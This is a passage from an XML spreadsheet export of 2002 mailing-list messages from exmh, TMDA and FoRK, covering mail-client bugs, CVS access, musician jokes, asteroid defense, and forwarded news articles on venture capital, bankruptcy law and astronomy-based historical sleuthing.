  they use ~/.tmda/config instead of ~/.tmdarc.  Hack appropriately for
  your setup.Basic explanation:  Exim sends all outbound mail thru the system filter (if one is
  configured) before attempting delivery.  The above system filter
  extracts the user from the From: address and pipes the message thru
  that user's TMDA setup via tmda-inject.  The system filter runs as the same user as Exim, thus the requirement
  for the chgrp mail.  If your Exim installation runs as a different
  user, chgrp as appropriate.  It should be fairly easy to do something similar under Postfix, but I
  haven't investigated that end.Notes:  This requires that all outbound mail that is to be processed with TMDA
  has a From: header which references a local user (suffixes are fine),
  and that the From: address is fully qualified with a known domain.  If
  you're vhosting the above setup would be fairly trivial to extend for
  other domains and $HOME paths.  I'm not vhosting on my desktop and so
  don't care.  You could also qualify on envelope or other headers if
  you wish.  A nice side effect of this approach for those running shared mail
  servers is that ALL users who have TMDA configs instantly get TMDA
  support for their outbound mail -- and in a manner that is less
  complex and less prone to end-user error than the typical TMDA
  configuration.Caveat Emptor.    ObNote: I've also written a small patch against TMDA 0.58 to add a
  "hold" delivery method (identical to "confirm" except it sends no
  confirmation requests -- very useful for testing configs or doing
  silent sidetracking of mail).--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</si>
  <si>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In message &lt;5378.1027548783@dimebox&gt;, Hal DeVore writes:
&gt;
&gt;&gt;&gt;&gt;&gt;&gt; On Wed, 24 Jul 2002, "Chris" == Chris Garrigues wrote:
&gt;
&gt;  Chris&gt; Am I the only one for whom typing control-L to the main
&gt;  Chris&gt; window causes this error?
&gt;
&gt;Getting it here too on a copy I haven't updated from CVS since 
&gt;about May sometime.It's in 2.5 as well.//Christer-- 
| Sys admin @ MEDIC              WWW: http://www.dtek.chalmers.se/            |
| Email: mort@dtek.chalmers.se   Phone: (0)31 772 5431, (0)707 53 57 57	      |
"I fought the loa and the loa won, I fought the loa and the loa won..."
        -- Dave Aronsson, a.s.r._______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Whatcha call the guy who hangs out with the band?  
The drummer.
COn Wed, 24 Jul 2002, Lucas Gonze wrote:&gt; 
&gt; Music school jokes --
&gt; 
&gt; American conductor and European conductor are talking.  European conductor 
&gt; says "what a week, I've had 5 rehearsals and a performance."  "That's 
&gt; nothing," says the American conductor, "I've had five performances and a 
&gt; rehearsal."  
&gt; 
&gt; What's the difference between a spring in the desert surrounded by palm 
&gt; trees and a violist that plays in tune?  A violist that plays in tune is a 
&gt; mirage.
&gt; 
&gt; What's the difference between a rat and a guitar player?  The rat's got 
&gt; something to do tonight.
&gt; 
&gt; Good thing it's not comedy school.
&gt; 
&gt; 
&gt; 
&gt; http://xent.com/mailman/listinfo/fork
&gt; -- 
"My theology, briefly, is that the universe was dictated but not
          signed."  (Christopher Morley) 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">There are so many good musician jokes.A couple of my favorites:Q. What's the difference between a viola and a violin?
A. A viola burns longer.Q. What's the definition of a minor second?
A. Two oboes playing in unison.- Joe
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera,  writes:    J&gt; There are so many good musician jokes.  I'd resisted after the first post, but now?Ok, two musicians and a banjo player walk into a music store ...-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Clawhammer Banjo,  Mandolin, Fiddle,  Mountain Dulcimer, Guitar, Bodhran
"You don't play what you know; you play what you hear." ---- Miles Davis
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; There are so many good musician jokes.Young Lutheran's Guide To The OrchestraCheers,
Waynehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, Rodent of Unusual Size wrote:&gt; Doesn't apply to this one; you're off by three orders of magnitude.
&gt; Only 2km diametre, this one.  Of course, that's still a lot of mass
&gt; to hit the planet even if it *is* in the form of dust and gas.Antimissile defense is designed to operate in ~LEO environment, and knocks
out stuff by kinetic kill or nearby nuking (damage by neutron flux
impacting the fissibles). It is *not* designed to apply a 100 MT warhead
(we don't have these, and synchonous impact is even more out of question)  
detonate-on-impact to a 28 km/s rock or rubble target. A 100 MT warhead
most assuredly will scarcely fragment a 2 km target in the few seconds
left before the impact. This is so obvious it doesn't even to need to be
modeled.&gt; Even if Shrub's wrist-rocket managed to vaporise it, we'd still get
&gt; transference to the Earth's energy balance, only to the atmosphere
&gt; rather than the litho- or hydrosphere.The anti-missile defense is about worse than useless in this case. The
only way to protect is determining orbits at high precision and deflecting
long-term. Decades for targets this size.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers wrote:
&gt; 
&gt; I don't think a ballistic missile defense system will be much help
&gt; against a rock a couple thousand kilometers in diameter.Doesn't apply to this one; you're off by three orders of magnitude.
Only 2km diametre, this one.  Of course, that's still a lot of mass
to hit the planet even if it *is* in the form of dust and gas.
Even if Shrub's wrist-rocket managed to vaporise it, we'd still get
transference to the Earth's energy balance, only to the atmosphere
rather than the litho- or hydrosphere.
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;From time to time I have to travel, and seem to end up with a rather slow
link back home that makes remote display of exmh rather slow, even over
ssh and/or VNC. What I'd  like to do is use an imap capable mailer to
communicate with an imap server that is serving up my MH folders. Does
anyone know of any Imap servers that can do this? I'd like it to be able
to handle the  mailstore using MH commands so things don't get out of
sync. At the moment I use a combo of fetchmail and procmail to handle
soring things when I'm local, and it's possible that an imap server
would mung this when I deleted a message remotely.	Stephen-- 
  The views expressed above are not those of PGS Tensor.    "We've heard that a million monkeys at a million keyboards could produce
     the Complete Works of Shakespeare; now, thanks to the Internet, we know
     this is not true."            Robert Wilensky, University of California
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; On Thu, 25 Jul 2002, "Stephen" == Stephen Hocking wrote:  Stephen&gt; What I'd like to do is use an imap capable mailer to
  Stephen&gt; communicate with an imap server that is serving up my MH
  Stephen&gt; folders. Does anyone know of any Imap servers that can do
  Stephen&gt; this?This topic comes up every so often on this list.  The short answer is 
no, there really isn't an IMAP server which knows how to do this.The longer answer is, UW-IMAP claims it does, but doesn't do a good 
job, and doesn't update scan caches, unseen, etc.You may have better luck while on the road using raw mh commands to 
read you e-mail if you have ssh access to your internal environment.
I've been doing this for quite a long time, and, after the learning 
curve of the mh command set (which I still don't know completely),
I'm quite able to access my e-mail and respond to those e-mails which 
require a response.Another option is using mutt as your mail client when you're remotely 
accessing e-mail.  Mutt does a decent job of dealing with mh folders, 
though it doesn't update scan caches or unseen files either.  But it 
is a decent interface alternative to raw mh, and it's quite 
customizable.The real answer to your question is that we need not an IMAP server 
that understands mh folders, but an mh server to which a local client 
could connect to.  In theory, it shouldn't be too hard (technically) 
to cobble this together with ssh.  Replace all of exmh's calls to mh 
commands with a wrapper which uses ssh to lob these commands over to 
a remote system, and dump the output back into the local exmh client.-- Seeya,
Paul
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">[1] Covalent works with Microsoft to provide ASP.NET capabilities for
Apache 2.0.  ASP.NET actually has some really elegant tools for doing
load testing and analysis. Perhaps Microsoft's desire to embrace, extend, and
extinguish comes from a scathing Gartner report recommending not to deploy
IIS for enterprise applications at all.   Now users get the best of both
worlds: all the development tools of ASP.Net and the security and reliability
of Apache.Greg-- 
Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
[1]http://www.infoworld.com/articles/hn/xml/02/07/25/020725hnapachenet.xml&gt; With help from Microsoft in Redmond, Wash., Covalent said it was able to develop a &gt; module for its Enterprise Ready Server that would allow ASP.Net applications to run on &gt; Apache 2.0. However, organizations that use the freely available Web server won't be able &gt; to run ASP.Net applications unless they purchase Covalent's software. Zemlin said that the &gt; company doesn't plan to release an open-source version of its .Net module.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">OPWV and a bad moon rising.&gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV
&gt; 
&gt; PR Newswire, Thursday, July 25, 2002 at 06:03
&gt; 
&gt; /FROM PR NEWSWIRE CHICAGO 888-776-6551/ [STK] DYN MANU SWY OPWV [IN] FIN MLM [SU] INO -- 
WITH PHOTO -- TO BUSINESS EDITOR:
&gt; 
&gt; Zacks Issues Recommendations on 4 Stocks: DYN, MANU, SWY and OPWV
&gt; 
&gt; CHICAGO, July 25 /PRNewswire/ -- Zacks.com releases details on four more stocks that are part of their exclusive list of Stocks to Sell Now. These stocks are currently rated as a Zacks Rank #5 (Strong Sell). These stocks have been proven to under-perform the S&amp;P 500 by 89.8% since its inception in 1980. While the rest of Wall Street continued to tout stocks during the market declines of the last few years, we were telling our customers which stocks to sell in order to save themselves the misery of unrelenting losses. Among the #5 ranked stocks today we highlight the following companies: Dynegy, Inc. (NYSE:DYN) and Manugistics Group, Inc. (NASDAQ:MANU), Safeway, Inc. (NYSE:SWY) and Openwave Systems, Inc. (NASDAQ:OPWV). To see the full Zacks #5 Ranked list of Stocks to Sell Now then visit http://stockstosellpr.zacks.com .
-- 
Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.comhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
I just successfully did a cvs update via ssh.My CVS root looks a little different than yours.cat CVS/Root 
:ext:haldevore@cvs.exmh.sourceforge.net:/cvsroot/exmh--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Can anyone access the CVS server for exmh?
The last thing I was able to do was try a "cvs commit", but
I got an "up-to-date check failed" for a couple files,
exmh.CHANGES and lib/msg.tcl, I think, so I then tried "cvs update".
I get a password prompt, and then it just hangs.cat CVS/Root
welch@cvs.sourceforge.net:/cvsroot/exmh--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, it wouldn't be my own vanity list if I didn't forward at least a 
little purely self-interested data.This week is my Europe Week. In classic TRAVELMAN fashion, I'm hitting 
two nights each in Paris, London, Hamburg, and Copenhagen.I get to cure Rob's brain-pains this weekend, though at risk of missing 
the big concert in London Sunday :-(&gt; Around Town
&gt; Channel 4's Indian Summer
&gt;
&gt; As England meets India in four test matches this Summer, Channel 4 
&gt; brings together a host of activities reflecting Indian life in a free 
&gt; event held over the weekend (27/28 July). A huge screen in Regent's 
&gt; Park will bring coverage of the first Test Match live from Lords 
&gt; throughout the weekend. Marylebone Green will be the setting for a 
&gt; chance to sample a mix of Indian food, music and film; an 8-piece 
&gt; Indian-style brass band will be performing Bollywood tunes, and there 
&gt; will be live DJ sets as well as performance by The Angel Dancers, who 
&gt; have performed with Bollywood stars around the world. In the evening 
&gt; (27), there will be an open-air screening of the comedy hit 'Monsoon 
&gt; Wedding'. A live concert by award-winning, British-Asian artist Nitin 
&gt; Sawhney will bring the weekend to a climax on 28 July, with special 
&gt; guests including Badmarsh &amp; Shri and Asian Dub Foundation.
&gt;
&gt; 27-28 July, 10.30am-9pm, Marylebone Green, Regent's Park. Baker Street/ 
&gt; Great Portland Street/ Regent's Park tubeInstead, I'm arriving in London on Monday morning, staying through a 
show of Andrew Lloyd Weber's new production, Bombay Dreams&gt; Bombay Dreams Set to be the latest in a long line of Andrew Lloyd 
&gt; Webber smash hits comes 'Bombay Dreams', based on the book by Meera 
&gt; Syal, and lyrics by AR Rahman, whose last project was the 
&gt; Oscar-nominated 'Lagaan'. The project cost Â£4 million and doesn't 
&gt; feature a single note of Lloyd Webber's music - which may or may not be 
&gt; a good thing!
&gt;
&gt; Until 29 Sept, 7.45pm Mon-Tue &amp; Fri, 3pm &amp; 7.45pm.Wed &amp; Sat, Apollo 
&gt; Victoria, Wilton Road, SW1 (0870 4000 650). Victoria tube/rail.I'll be visiting a cousin-in-law (my cousin's visa is still in the 
works... a looong process).The next stop is to visit a cousin's family proper, and a niece I 
haven't met since she was born 3-4 years ago. Should be a blast!Finally, Friday and Saturday of next week will be Copenhagen for 
Henrik's second wedding... to the same woman, tho! :-)Bon voyage,
   RohitPS. Yes, it's egotistical to wish oneself a "Bon Voyage". Screw it, it's 
my list, dammit!---
My permanent email address is khare@alumni.caltech.eduhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">The trend isn't news, but some of the details of the ugliness are 
interesting.   Worth FoRKing for the archives, too.http://www.nytimes.com/2002/07/28/business/yourmoney/28VENT.html?todaysheadlines=&amp;pagewanted=print&amp;position=top
July 28, 2002
Venture Capitalists Are Taking the Gloves Off
By LYNNLEY BROWNINGThe venture capital world is looking less like a genteel club and more like
a brawling barroom.Venture capitalists are offering the companies they bankroll increasingly
hard-knuckled deals that leave little wealth for a start-up's managers or
original backers. The moves are leading some entrepreneurs, desperate for
money, to decry today's investors as bullies. Some venture capitalists are
even suing rival venture firms, asserting that the tough new terms are
wiping out the value of their previous investments."People are playing hardball," said Ted Dintersmith, a general partner at
Charles River Ventures, based in Waltham, Mass.The bursting of the Internet stock bubble more than two years ago wiped out
many venture investments in dot-coms.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20 years," said Steven E. Bochner, a
securities lawyer at Wilson Sonsini Goodrich &amp; Rosati in Palo Alto, Calif.,
who represents venture firms.In the boom of the late 1990's,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2.But with markets now all but dead for initial public offerings and mergers
and acquisitions, venture capitalists from Silicon Valley to the East Coast
are increasingly demanding - and getting - both options. This "double dip,"
known as "participating preferred," leaves far less potential wealth for a
company's founders and previous investors. Venture capitalists are also
negotiating more deals with heightened "liquidation preferences," in which
start-ups agree to pay back the initial investment at least two or three
times over.Previously, venture capitalists handed over money to a start-up in a lump
sum. But more are now parceling out funds in tranches, and then only when
the new companies reach certain milestones - a sales target, for example,
or the hiring of a particular chief executive.They are even trying to protect their investments through veto rights that
permit them to block future investments from other venture capitalists who
might dilute their stakes, said Mark G. Borden, chairman of the corporate
department at Hale &amp; Dorr, a law firm based in Boston. As a result, Mr.
Borden said, a start-up company that casts its lot with a particular
venture capitalist or group of investors may find itself tethered to those
backers and unable to raise new money elsewhere.ENTREPRENEURS particularly dislike one recent trend: venture capitalists
have been pushing young companies to agree, retroactively, to lower the
prices that investors now pay for shares should the start-up be worth less
when it tries to raise more money later. Such a move, known as a "full
ratchet," is intended to prevent an investor's stake from being diluted.
But it can significantly reduce or even wipe out the stakes of a company's
original investors and managers, giving the new investors most of the
company for a song."If you were in the first round of investors, you generally now get
crushed" when a start-up raises more money later, said J. Edmund Colloton,
general partner and chief operating officer of Bessemer Venture Partners,
based in Wellesley Hills, Mass.Consider Mahi Networks, a private optical networking start-up. In three
rounds of financing, from September 1999 to November 2001, Mahi raised $110
million from blue-chip venture firms like Benchmark Capital, Sequoia
Capital, the GE Capital unit of General Electric and the venture arm of
Goldman Sachs. At one point during the Internet boom, Mahi was valued at
more than $180 million.Last month, though, a new group of smaller-name investors, led by St. Paul
Venture Capital of Minneapolis, acquired about three-quarters of the
company for $75 million in financing. Before that, Mahi was valued at only
$25 million, said Chris Rust, Mahi's president and chief executive. But
most of that was tied up in employee incentives, including stock options,
leaving almost no value for existing investors.Despite having nurtured Mahi with money and advice, the early investors
chose not to back the company further. With the new, lower valuation,
"there was effectively no value attributed to all of our previous
investments," said one venture capitalist whose firm was an early backer.
"We were all completely washed out" in the last round, said the investor,
who spoke on condition of anonymity.There is no hard data on the prevalence of the newer, tougher terms.
Venture capitalists are famously secretive about their deals, which are
private and largely unregulated. But ask venture capitalists or securities
lawyers who work with start-ups, and tales of onerous terms will abound.
"At the end of the day, the money is coming with strings attached," said
Mark G. Heesen, president of the National Venture Capital Association, a
trade group based in Arlington, Va.The shift has turned the conventional wisdom on its head. Venture
capitalists once loved risk, but no more. The Internet bust and Wall
Street's slump have left them scrambling to make money to repay their own
investors and to justify their management fees.Venture capitalists once clamored to be first in the door of a hot new
company. Now they can usually make money only by being the most recent
investor. "We're certainly looking for later-stage deals, where you get the
benefit of the previous investors having taken the risk," said Todd Dagres,
a general partner at Battery Ventures in Wellesley, Mass.Some entrepreneurs agree to the harsh new terms simply because they have no
other way to raise cash to survive. But other managers now shun the
investors, whom they call "vulture capitalists," bent on picking the meat
off a young or struggling start-up. Today's venture capitalists "want to
take advantage of you," said George R. Waller, chief executive of Strike
Force Technologies, an employee-financed software maker in West Orange,
N.J. Mr. Waller said he had turned away 30 venture firms in recent months
because they had demanded, among other things, hard-to-reach sales
milestones.George J. Nassef, chief executive of ValetNoir, a start-up based in New
York that makes marketing software for casinos, said several venture firms
had even asked in recent months to have their potential investments secured
with receivables, or money owed to ValetNoir by its customers. He turned
them all down.NOT surprisingly, the shift in financing terms is upsetting some venture
firms that were early investors in start-ups but are now suffering as the
companies seek to raise additional money at bargain-basement prices.In one high-profile case, Benchmark Capital, a blue-chip Silicon Valley
firm, sued the Canadian Imperial Bank of Commerce and Juniper Financial
this month. Benchmark was an early investor in Juniper, an online financial
services concern, having put $20 million into it in early 2000, just before
the Internet bubble burst. It also contributed to a second, $94 million
round that September. Juniper, based in Wilmington, Del., is seeking to
raise $50 million from Canadian Imperial, which already owns around half
the company, but on terms that would sharply dilute Benchmark's original,
unspecified stake. Benchmark sued to prevent the start-up from raising the
money. All the parties declined to comment on the case, which a Delaware
judge threw out last week.Such friction was rare during the boom, when venture capitalists operated
like a competitive but tight-knit fraternity, channeling deals to one
another. Start-ups and their backers saw their interests as allied. But in
tighter markets, "there's a lot of ugly behavior coming out," said Mr.
Bochner, the Wilson Sonsini lawyer. "There's going to be much more
litigation like this."
-------------------------------------------------------http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Welcome to 2002.  Companies that have taken on way too much debt can
screw their shareholders and even some of their debt-holders by
declaring bankruptcy, as Enron and Worldcom have done; meanwhile,
it becomes more difficult for individuals who have similarly taken on
too much debt, to dig their way out of their own holes...In my next life, I'm coming back as a corporation.  They get all the
perks. :)
http://www.nytimes.com/2002/07/27/business/27BANK.htmlA Sudden Rush to Declare Bankruptcy Is Expected
By PHILIP SHENONWASHINGTON, July 26 The compromise bill, which was approved on Thursday
by Congressional negotiators and is expected to be adopted in both the
House and Senate by the end of next week, will make it much harder for
Americans to wipe out their debts when they declare bankruptcy.After the agreement, lawyers around the country said that they had begun
to receive calls and visits from debtors worried that they needed to
file bankruptcy before the old rules lapse next year."I've had plenty of calls this morning," said Gary F. Weltmann, a
consumer bankruptcy lawyer in Washington. "And I'm telling people that
they need to take action now."Marty K. Courson, a bankruptcy lawyer in San Francisco, said he was
"getting ready for the onslaught.""I do think there will be a lot of people trying to use the old rules,"
he said.The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House-Senate
conference committee, passed both chambers by overwhelming margins more
than a year ago. The conference committee approved the bill Thursday
after agreeing on an abortion-rights provision that had been the final
obstacle to passage; the provision will bar anti-abortion protesters
from using the bankruptcy laws to avoid paying court judgments as a
result of clinic protests.The bill has long been the top legislative priority of the credit card
and banking industries, which say that many people now abuse the
bankruptcy system by writing off debts that they should be able to
pay. There were 1.45 million bankruptcy filings last year, a record, up
19 percent from 2000."This legislation restores integrity and accountability to our
bankruptcy system by offering a fresh start to those who deserve one
while cracking down on those who don't," said Representative F. James
Sensenbrenner Jr., the Wisconsin Republican who is chairman of the House
Judiciary Committee.Critics, including top consumer-rights groups, described the bill as a
gift to lenders in exchange for a recent, drastic increase in campaign
contributions to members of Congress. They also said that it would do
harm to millions of Americans in financial distress as a result of lost
jobs, poor health or divorce.The bill's opponents have also questioned the timing of its passage,
which comes in the midst of a Congressional crackdown on abusive
accounting practices by many of the largest companies, including some of
the same financial services companies that have lobbied strenuously for
the bankruptcy bill."The timing couldn't be worse," said Travis B. Plunkett, the legislative
director of the Consumer Federation of America. "It takes a lot of gall
for Congress to make a move like this when so many Americans are
concerned about corporate abuses, and when the economy is so shaky." Senator Paul Wellstone, a Minnesota Democrat who is a leading critic of
the bill, said today that "it boggles the mind that at a time when
Americans are more economically vulnerable, when they are most in need
of protection from financial disaster, we would eviscerate the major
financial safety net in our society for the middle class."Bankruptcy lawyers said that the bill would do harm to low- and
middle-income clients who would be saddled with debts that would take
them years to pay back. The new law will end the debt-free "fresh start"
that many of those debtors had been permitted under the current law.Recent studies have shown that the average American filing for
bankruptcy has a median household income well below the national average
of about $42,000 in 2000. A study cited in Congressional testimony last
year showed that the average person filing for bankruptcy had a car that
was six to nine years old, and that a quarter of those people had
medical debts exceeding $1,000."I won't deny that there are people who abuse the bankruptcy system,"
said Mr. Weltmann, the Washington lawyer whose firm calls itself the
Bankruptcy Center. "But there are honest, hard-working folks who are
really going to be affected by these changes."The bill would impose a means test on debtors, based on median incomes
in their home states, for bankruptcy filings under Charter 7 of the
federal bankruptcy law, which permits debtors to erase most of their
unsecured debts, like credit card bills.Debtors with an income above the state median would be barred from
filing under Chapter 7 and would instead be required to file instead
under Chapter 13, which requires that a portion of the unsecured debt be
repaid over time under the court-administered plan.Mr. Courson, the San Francisco lawyer, said that the changes would "hurt
a lot of consumer debtors who really, rightfully belong in Chapter 7.""My clients, for the most part, are honest and unfortunate people, and
they've just got heavy debt," he said. "You can always find some
circumstance where a person really went to town with a credit card and
got themselves in trouble. But I have people who are just plain old
poor. My experience is something wildly different than the story that
the credit card companies make to Congress."
----
aDaM@XeNT.CoM -- .sig double play!
At its peak, there were more than 100 peer-to-peer start-ups. There now
remain, at most, a couple of dozen companies concentrated in a few
niches. The main activity of companies venturing into peer to peer is
file sharing. But the dozens of overoptimistic forays into alternative
economic systems, hyper-sophisticated technologies, and recording
industry collaboration turned out to be dead ends.  Peer-to-peer
auctions, peer-to-peer supply chain management, and peer-to-peer e-mail
may have failed because they were ahead of their time. It's more likely
they failed because they were just ahead of themselves.  Clearly, the
public's appetite for file sharing has increased, and the state of the
art has improved dramatically. But companies have still not yet found
satisfactory business models, thus leaving file sharing's last chapter
unwritten.
  -- Gene Kan, http://story.news.yahoo.com/news?tmpl=story&amp;u=/zd/20020710/tc_zd/942734
XML proxies are add-ons to firewall and network environments that have
the ability to monitor XML traffic and apply business rules and IT
policies such as security, routing, performance, management,
transformation, and connection provisioning.  Current firewalls aren't
able to peek in the envelope and decipher XML traffic, said report
author Ronald Schmelzer, ZapThink senior analyst.  XML proxies are not
only able to understand network protocols, but also the XML-based
content traveling on top of those protocols, Schmelzer said.  ZapThink
identifies a slew of new vendors with XML-ready security solutions,
including Flamenco Networks, Forum Systems, Reactivity, Vordel, and
Westbridge Technology, among others... ZapThink estimates that XML
represents just 2 percent of network traffic today, but that will
increase to almost 25 percent by 2006.
  -- http://www.internetwk.com/story/INW20020726S0004
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
&gt; I am getting some strange messages from EXMH 2.5.
&gt; Since I just finished reinstalling it, I dont see how something could be
&gt; missing. Here is the message:
&gt; 
&gt; When the Compose or Reply windows first come up, I get a popup that says:
&gt;     Invalid I-spell style: 'extr switch with no body' changing to underline
&gt; 
&gt; Any thoughts??? I this complaining about a EXMH routine being missing?
&gt; Or What???
&gt; -- 
&gt;                                         Reg.Clemens
&gt;                                         reg@dwf.com
&gt; 
&gt; Let me answer my own question.
This seems to be a problem in tk8.4.
There is a switch statement at lines 691-697 in ispell.tcl inside a catch.
It ends with a line ending with a backslash, followed by a blank line.This seems to be enough to confuse this verson of tk.  Removing the backslash
causes the error to go away, and the catch is not executed.
-- 
                                        Reg.Clemens
                                        reg@dwf.com
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Donald Eastlake 3rd 
July 16, 2002
By Yonder Blessed Moon, Sleuths Decode Life and Art
By LEON JAROFFOn its way back from the Pacific island of Tinian, where it had
delivered the uranium core for the atomic bomb that destroyed Hiroshima,
the heavy cruiser Indianapolis was torpedoed by the Japanese submarine
I-58 and sent to the bottom of the Philippine Sea. It was one of the
worst disasters in American naval history; only 317 of its nearly 1,200
crew members survived.Now experts at Southwest Texas State University have given that tragic
story a startling new twist.It was the moon, they say, that sank the Indianapolis. Or anyway, they
write in the July issue of Sky &amp; Telescope, it was the moon that made
the sinking possible.Using astronomical computer programs, records and weather reports, as
well as the known coordinates and running speeds of the ship and the
submarine that sank it, the authors determined that when the I-58
surfaced, it was perfectly aligned, west to east, with the cruiser. And,
they said, a three-quarter moon had just emerged from behind the clouds.Looking across the moonlit water, an I-58 crewman spotted the ship
silhouetted against the sky, 10.3 miles away. Half an hour later, six
torpedoes sent it to the bottom."It was sheer chance," said Dr. Donald Olson, an astronomer. "Without
that alignment with the moon, the lookouts would not have spotted the
cruiser, especially at that distance."With Russell Doescher, a physics lecturer, Dr. Olson conducts a
university honors course called "Astronomy in Art, History and
Literature." In the last 15 years, he has pinpointed the time and place
of the rendering of art masterpieces, given new interpretations of
astronomical references in Chaucer and revealed the decisive role of the
moon in military and other encounters.Two years ago, for example, Dr. Olson turned his attention to the bright
star in van Gogh's "White House at Night." He and some students went to
Auvers, France, where van Gogh created his final works, and searched
until they found the house, largely unchanged. Sifting through letters
from van Gogh to his brother, Dr. Olson found that the painting was
completed in June 1890.Noting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mid-June
had occupied that part of the sky.A final check of local weather records pinpointed the actual date van
Gogh had composed the painting, June 16, the only clear day in the
middle of the month that year.Dr. Olson has also turned his attention to Shakespeare, intrigued by the
opening of "Hamlet," when guards on the ramparts of Elsinor refer to the
"star that's westward from the pole had made his course to illume that
part of heaven where now it burns." From the guards' description, the
season and the time, other astronomers had suggested several bright
stars as possibilities, but Dr. Olson's calculations placed it in the
constellation Cassiopeia, which lacks any notably luminous stars.Pondering this problem on a trip with his wife, Dr. Olson was suddenly
inspired. He was aware that in 1572, a supernova, called Tycho's star,
for the Danish astronomer Tycho Brahe, suddenly flamed in Cassiopeia,
creating a worldwide sensation. Shakespeare, 8 at the time, would
certainly have recalled the event, and his memory was probably refreshed
by the description of the supernova in a history book that was the
source of some of his best-known plays.Dr. Olson has no doubt that the star that glared above Elsinor that
night was Tycho's, and he has an impressive record of other
astronomy-based sleuthing.Aware that the photographer Ansel Adams often neglected to date his
negatives, Dr. Olson set out to find when Adams had shot his classic
"Moon and Half Dome." At Yosemite, Dr. Olson and his students found
Adams's vantage point, studied the location, phase and features of the
moon in the photograph, plus the shadows on the Dome, snow on the peak
and other clues, and then announced that the picture had been taken at
4:14 p.m., Dec. 28, 1960.Then, Dr. Olson calculated that the setting would be virtually identical
at 4:05 p.m. on Dec. 13, 1994. On that day Adams's daughter-in-law
visited Yosemite and was photographed holding a print of "Moon and the
Half Dome" in the foreground of an eerily similar view of the actual
moon and the Half Dome.Analyzing Chaucer's works, Dr. Olson has confirmed that a particularly
rapid movement of the moon described in "The Merchant's Tale" occurred
in April 1389. And in "The Franklin's Tale," Chaucer's description of
the heavenly alignment that caused an exceptionally high tide on the
Brittany coast, convinced Dr. Olson that Chaucer was an advanced amateur
astronomer.Then there was Paul Revere. On his way to saddle up for his famous ride,
how did he manage to row undetected past a British warship on a moonlit
night in Boston Harbor? Dr. Olson's computer program revealed that,
while the moon was nearly full that night, it was unusually close to the
southern horizon and did not illuminate Revere's boat.Dr. Olson's proudest achievement was explaining "the tide that failed"
in the bloody Marine Corps landing at Tarawa atoll on Nov. 20, 1943.
Planners had expected a tide to provide a water depth of five feet over
a reef some 600 yards from shore, allowing larger landing craft, with
drafts of at least four feet, to pass.But that day and the next, in the words of some observers, "the ocean
just sat there," providing neither low tide nor high tide and leaving a
mean depth of three feet over the reef. The craft grounded on the edge
of the reef, and many marines were killed or injured as they waded 600
yards to the shore, rifles over their heads, in the face of machine-gun
fire from the Japanese.Asked by a former marine about the tidal phenomenon, Dr. Olson spent six
months researching and mastering tidal theory and discovered that the
military planners were aware that they had to contend with a "neap"
tide. This phenomenon occurs twice a month when the moon is near its
first or last quarter, because the countering tug of the sun causes
water levels to deviate less.But that day, the moon was also almost at its farthest point from earth
and exerted even less pull, leaving the waters relatively undisturbed
and the marines in trouble."I'm not in the least blaming the planners," Dr. Olson said, explaining
that the techniques used in accurately determining tides hadn't been
applied to the waters at Tarawa.Indeed, he modestly claims, by using his computer program, "We can
calculate the tides in any port in the world on any day in history."Yet Dr. Olson's greatest satisfaction seems to stem from his
interdisciplinary approach to astronomical sleuthing. "I have thought
about van Gogh, about Shakespeare and Chaucer," he says, "and that has
made my life as a scientist much richer."
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">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doesn't work anymore.  You have
to resort to Rescan Folder.  In fact, when you change folders you
continue to have the Pick results, not the new folder contents.
If you go to a any folder and do Rescan, then it heals itself.
--
Brent Welch
Software Architect, Panasas Inc
Pioneering the World's Most Scalable and Agile Storage Network
www.panasas.com
welch@panasas.com
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
